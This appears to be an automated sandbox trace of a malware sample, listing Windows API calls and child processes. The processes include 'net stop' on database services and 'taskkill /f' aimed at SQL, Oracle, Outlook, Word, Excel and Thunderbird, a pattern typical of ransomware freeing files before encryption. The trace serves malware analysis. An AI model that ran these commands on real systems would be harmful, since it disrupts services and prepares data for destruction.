GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0061.792] GetProcessHeap () returned 0x770000 [0061.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xe0) returned 0x7833d0 [0061.792] GetProcessHeap () returned 0x770000 [0061.792] RtlReAllocateHeap (Heap=0x770000, Flags=0x0, Ptr=0x7833d0, Size=0x76) returned 0x7833d0 [0061.792] GetProcessHeap () returned 0x770000 [0061.792] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x7833d0) returned 0x76 [0061.793] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0061.793] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x36eb44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36eb44) returned 0xffffffff [0061.793] GetLastError () returned 0x2 [0061.793] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x36eb44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36eb44) returned 0xffffffff [0061.794] GetLastError () returned 0x2 [0061.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0061.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x36eb44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36eb44) returned 0x783450 [0061.794] GetProcessHeap () returned 0x770000 [0061.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x783490 [0061.794] FindClose (in: hFindFile=0x783450 | out: hFindFile=0x783450) returned 1 [0061.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x36eb44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36eb44) returned 0xffffffff [0061.794] GetLastError () returned 0x2 [0061.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x36eb44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36eb44) returned 0x783450 [0061.794] GetProcessHeap () returned 0x770000 [0061.794] RtlReAllocateHeap (Heap=0x770000, Flags=0x0, Ptr=0x783490, Size=0x4) returned 0x783490 [0061.794] FindClose (in: hFindFile=0x783450 | out: hFindFile=0x783450) returned 1 [0061.794] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0061.794] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0061.794] GetConsoleTitleW (in: lpConsoleTitle=0x36f03c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.795] InitializeProcThreadAttributeList (in: lpAttributeList=0x36eec4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x36ef8c | out: lpAttributeList=0x36eec4, lpSize=0x36ef8c) returned 1 [0061.795] UpdateProcThreadAttribute (in: lpAttributeList=0x36eec4, dwFlags=0x0, Attribute=0x60001, lpValue=0x36ef84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x36eec4, lpPreviousValue=0x0) returned 1 [0061.795] GetStartupInfoW (in: lpStartupInfo=0x36ee80 | out: lpStartupInfo=0x36ee80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0061.795] GetProcessHeap () returned 0x770000 [0061.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x18) returned 0x783450 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0061.795] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0061.796] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0061.796] GetProcessHeap () returned 0x770000 [0061.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x783450 | out: hHeap=0x770000) returned 1 [0061.796] GetProcessHeap () returned 0x770000 [0061.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xa) returned 0x77ff10 [0061.796] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0061.797] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop DbxSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x36ef20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop DbxSvc", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36ef6c | out: lpCommandLine="net stop DbxSvc", lpProcessInformation=0x36ef6c*(hProcess=0x78, hThread=0x74, dwProcessId=0x958, dwThreadId=0x6ec)) returned 1 [0062.046] CloseHandle (hObject=0x74) returned 1 [0062.046] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0062.046] GetProcessHeap () returned 0x770000 [0062.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x785ee8 | out: hHeap=0x770000) returned 1 [0062.046] GetEnvironmentStringsW () returned 0x785ee8* [0062.046] GetProcessHeap () returned 0x770000 [0062.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xb36) returned 0x7840a8 [0062.046] FreeEnvironmentStringsW (penv=0x785ee8) returned 1 [0062.046] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0066.216] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x36ee60 | out: lpExitCode=0x36ee60*=0x2) returned 1 [0066.216] CloseHandle (hObject=0x78) returned 1 [0066.216] _vsnwprintf (in: _Buffer=0x36efa8, _BufferCount=0x13, _Format="%08X", _ArgList=0x36ee6c | out: _Buffer="00000002") returned 8 [0066.216] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0066.216] GetProcessHeap () returned 0x770000 [0066.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7840a8 | out: hHeap=0x770000) returned 1 [0066.216] GetEnvironmentStringsW () returned 0x7840a8* [0066.216] GetProcessHeap () returned 0x770000 [0066.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xb5c) returned 0x789590 [0066.216] FreeEnvironmentStringsW (penv=0x7840a8) returned 1 [0066.216] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0066.216] GetProcessHeap () returned 0x770000 [0066.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x789590 | out: hHeap=0x770000) returned 1 [0066.216] GetEnvironmentStringsW () returned 0x7840a8* [0066.216] GetProcessHeap () returned 0x770000 [0066.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xb5c) returned 0x789590 [0066.216] FreeEnvironmentStringsW (penv=0x7840a8) returned 1 [0066.216] GetProcessHeap () returned 0x770000 [0066.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x77ff10 | out: hHeap=0x770000) returned 1 [0066.216] DeleteProcThreadAttributeList (in: lpAttributeList=0x36eec4 | out: lpAttributeList=0x36eec4) [0066.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.217] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.217] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0066.217] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.217] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0066.217] SetConsoleInputExeNameW () returned 0x1 [0066.217] GetConsoleOutputCP () returned 0x1b5 [0066.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0066.217] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.218] exit (_Code=2) Process: id = "13" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x1271000" os_pid = "0x7c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xb34" cmd_line = "taskkill /f /im sql.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 36 os_tid = 0x808 Thread: id = 135 os_tid = 0x7c8 Thread: id = 146 os_tid = 0x9b8 Thread: id = 147 os_tid = 0x994 Thread: id = 148 os_tid = 0x980 Process: id = "14" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x7055000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb4c" cmd_line = "taskkill /f /im wordpad.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0x3c0 Thread: id = 57 os_tid = 0x86c Thread: id = 64 os_tid = 0x8b0 Thread: id = 67 os_tid = 0x8c8 Thread: id = 68 os_tid = 0x8d0 Process: id = "15" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x21809000" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xbb0" cmd_line = "taskkill /f /im onenote.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 38 os_tid = 0x534 Thread: id = 122 os_tid = 0x790 Thread: id = 127 os_tid = 0x62c Thread: id = 131 os_tid = 0x15c Thread: id = 132 os_tid = 0x318 Process: id = "16" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2406000" os_pid = "0x6d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb60" cmd_line = "taskkill /f /im outlook.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 39 os_tid = 0x41c Thread: id = 55 os_tid = 0x864 Thread: id = 61 os_tid = 0x8a4 Thread: id = 71 os_tid = 0x714 Thread: id = 72 os_tid = 0x688 Process: id = "17" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x7c3f000" os_pid = "0x56c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xba8" cmd_line = "taskkill /f /im excel.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0x644 Thread: id = 130 os_tid = 0x210 Thread: id = 145 os_tid = 0x934 Thread: id = 150 os_tid = 0x984 Thread: id = 151 os_tid = 0x97c Process: id = "18" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x6b2b000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb78" cmd_line = "taskkill /f /im thunderbird.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0x648 Thread: id = 53 os_tid = 0x858 Thread: id = 62 os_tid = 0x8a8 Thread: id = 65 os_tid = 0x8c0 Thread: id = 66 os_tid = 0x8c4 Process: id = "19" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x10df000" os_pid = "0x64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xb90" cmd_line = "taskkill /f /im oracle.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0x55c Thread: id = 123 os_tid = 0x7d0 Thread: id = 128 os_tid = 0x5a4 Thread: id = 133 os_tid = 0x7fc Thread: id = 134 os_tid = 0x7e4 Process: id = "20" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x126d000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xb44" cmd_line = "taskkill /f /im winword.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0x5e4 Thread: id = 56 os_tid = 0x868 Thread: id = 63 os_tid = 0x8ac Thread: id = 124 os_tid = 0x35c Thread: id = 125 os_tid = 0x6f8 Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x8b63000" os_pid = "0x900" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop OracleXETNSListener" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0x8fc [0061.721] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfefc | out: lpSystemTimeAsFileTime=0x1bfefc*(dwLowDateTime=0x94a72070, dwHighDateTime=0x1d57b18)) [0061.721] GetCurrentProcessId () returned 0x900 [0061.721] GetCurrentThreadId () returned 0x8fc [0061.721] GetTickCount () returned 0x1149db6 [0061.721] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfef4 | out: lpPerformanceCount=0x1bfef4*=18194243811) returned 1 [0061.722] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0061.722] __set_app_type (_Type=0x1) [0061.722] __p__fmode () returned 0x74eb31f4 [0061.722] __p__commode () returned 0x74eb31fc [0061.722] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0061.722] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0061.723] GetCurrentThreadId () returned 0x8fc [0061.723] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8fc) returned 0x60 [0061.723] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0061.723] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0061.723] SetThreadUILanguage (LangId=0x0) returned 0x409 [0061.723] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0061.723] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bfe8c | out: phkResult=0x1bfe8c*=0x0) returned 0x2 [0061.723] VirtualQuery (in: lpAddress=0x1bfec3, lpBuffer=0x1bfe5c, dwLength=0x1c | out: lpBuffer=0x1bfe5c*(BaseAddress=0x1bf000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.723] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x1bfe5c, dwLength=0x1c | out: lpBuffer=0x1bfe5c*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0061.723] VirtualQuery (in: lpAddress=0xc1000, lpBuffer=0x1bfe5c, dwLength=0x1c | out: lpBuffer=0x1bfe5c*(BaseAddress=0xc1000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0061.723] VirtualQuery (in: lpAddress=0xc3000, lpBuffer=0x1bfe5c, dwLength=0x1c | out: lpBuffer=0x1bfe5c*(BaseAddress=0xc3000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.723] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x1bfe5c, dwLength=0x1c | out: lpBuffer=0x1bfe5c*(BaseAddress=0x1c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0061.723] GetConsoleOutputCP () returned 0x1b5 [0061.724] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0061.724] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0061.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.724] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0061.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.724] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0061.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.724] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0061.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0061.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0061.725] GetEnvironmentStringsW () returned 0x5e2048* [0061.725] GetProcessHeap () returned 0x5d0000 [0061.725] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e2b20 [0061.725] FreeEnvironmentStringsW (penv=0x5e2048) returned 1 [0061.725] GetProcessHeap () returned 0x5d0000 [0061.725] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x5e0c80 [0061.725] GetEnvironmentStringsW () returned 0x5e2048* [0061.725] GetProcessHeap () returned 0x5d0000 [0061.725] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e35f8 [0061.726] FreeEnvironmentStringsW (penv=0x5e2048) returned 1 [0061.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1bedfc | out: phkResult=0x1bedfc*=0x68) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x0, lpData=0x1bee08*=0x0, lpcbData=0x1bee00*=0x1000) returned 0x2 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x1, lpcbData=0x1bee00*=0x4) returned 0x0 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x0, lpData=0x1bee08*=0x1, lpcbData=0x1bee00*=0x1000) returned 0x2 [0061.726] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1bee04, lpData=0x1bee08, lpcbData=0x1bee00*=0x1000 | out: lpType=0x1bee04*=0x4, lpData=0x1bee08*=0x0, lpcbData=0x1bee00*=0x4) returned 0x0 